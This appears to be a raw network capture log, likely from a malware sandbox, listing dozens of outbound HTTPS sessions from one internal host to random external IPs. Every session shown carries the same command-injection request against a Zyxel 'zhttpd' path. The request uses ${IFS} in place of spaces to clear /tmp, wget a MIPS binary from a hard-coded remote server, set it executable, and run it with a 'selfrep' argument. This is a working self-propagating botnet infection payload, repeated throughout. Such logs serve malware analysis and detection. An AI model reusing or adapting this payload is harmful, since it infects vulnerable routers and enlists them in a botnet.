                                              Jan 29, 2024 07:04:10.414052963 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9487192.168.2.1455380204.64.77.247443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:10.414083958 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9488192.168.2.144540269.177.131.184443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:10.414133072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9489192.168.2.1447134157.27.253.181443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:10.414165020 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9490192.168.2.1435926176.179.34.179443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:10.414217949 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9491192.168.2.1442338181.195.224.185443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:10.414259911 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9492192.168.2.1435384137.133.58.2443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:10.414316893 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9493192.168.2.143501849.135.205.195443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:10.414347887 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9494192.168.2.144754234.110.30.49443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:10.414383888 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9495192.168.2.1437280218.28.202.101443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:10.414418936 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9496192.168.2.1450298151.37.144.30443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:10.414442062 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9497192.168.2.1444492121.209.169.183443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:10.414490938 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9498192.168.2.1449362130.111.3.110443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:10.414540052 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9499192.168.2.144372618.205.213.145443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:10.414587021 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9500192.168.2.1450268157.156.206.184443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:10.414632082 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9501192.168.2.143634425.128.225.60443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:10.414669991 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9502192.168.2.1458402201.147.43.143443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:10.414707899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9503192.168.2.143981470.231.16.249443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:10.414751053 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9504192.168.2.144773095.239.23.158443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:10.414800882 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9505192.168.2.1447480160.190.55.48443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:10.414829969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9506192.168.2.1448262104.139.136.7443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:10.414890051 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9507192.168.2.1454636101.160.242.140443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:10.414918900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9508192.168.2.1452320204.206.115.85443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:10.414988041 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9509192.168.2.1457678130.81.166.140443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:10.415023088 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9510192.168.2.1445370154.212.235.20443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:10.415059090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9511192.168.2.1450570213.81.6.108443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:10.415086985 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9512192.168.2.145021462.148.178.77443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:10.415108919 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9513192.168.2.145218875.155.194.58443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:10.415172100 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9514192.168.2.1460714199.252.169.249443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:10.415205956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9515192.168.2.145472236.159.6.209443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:10.415237904 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9516192.168.2.1442658130.188.197.176443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:10.415266991 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9517192.168.2.1436690160.147.234.73443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:10.415314913 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9518192.168.2.1448668108.7.215.104443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:10.415381908 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9519192.168.2.144267646.55.126.21443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:10.415410995 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9520192.168.2.1433484211.249.153.215443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:10.415437937 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9521192.168.2.145253041.208.10.95443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:10.415488958 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9522192.168.2.14343008.198.85.45443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:10.415524006 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9523192.168.2.145966054.246.192.25443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:10.415570974 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9524192.168.2.1434836177.20.65.123443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:10.415596008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9525192.168.2.1447288135.16.67.52443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:10.415635109 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9526192.168.2.1453348222.58.203.171443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:10.415654898 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9527192.168.2.145538041.228.189.48443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:10.415713072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9528192.168.2.1440516165.47.74.186443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:10.415745974 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9529192.168.2.1456100198.207.89.150443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:10.415796995 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9530192.168.2.143686459.40.244.159443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:10.415843010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9531192.168.2.1434292123.153.90.239443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:10.415872097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9532192.168.2.1446486184.87.198.5443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:10.415921926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9533192.168.2.1448830136.51.81.236443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:10.415951967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9534192.168.2.1435634208.86.236.219443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:10.415985107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9535192.168.2.1445236216.237.219.150443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:10.416042089 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9536192.168.2.145125662.96.125.251443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:10.416069984 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9537192.168.2.1445438222.33.167.143443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:10.416115999 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9538192.168.2.1432864163.72.125.75443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:10.416146994 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9539192.168.2.1434860193.183.81.153443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:10.416177988 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9540192.168.2.1459312117.91.182.128443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:10.416224957 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9541192.168.2.1441842107.77.236.94443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:10.416258097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9542192.168.2.1456066112.205.168.89443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:10.416285992 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9543192.168.2.145855420.161.48.4443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:10.416311026 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9544192.168.2.143785275.108.47.105443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:10.416363001 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9545192.168.2.1444182130.139.223.215443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:10.416384935 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9546192.168.2.1452622153.116.11.187443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:10.420361996 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9547192.168.2.1456424199.48.83.126443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:10.420387983 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9548192.168.2.144796272.230.19.21443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:10.420428991 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9549192.168.2.144825831.90.204.205443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:10.420463085 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9550192.168.2.1436244186.31.114.197443
                                              TimestampBytes transferredDirectionData
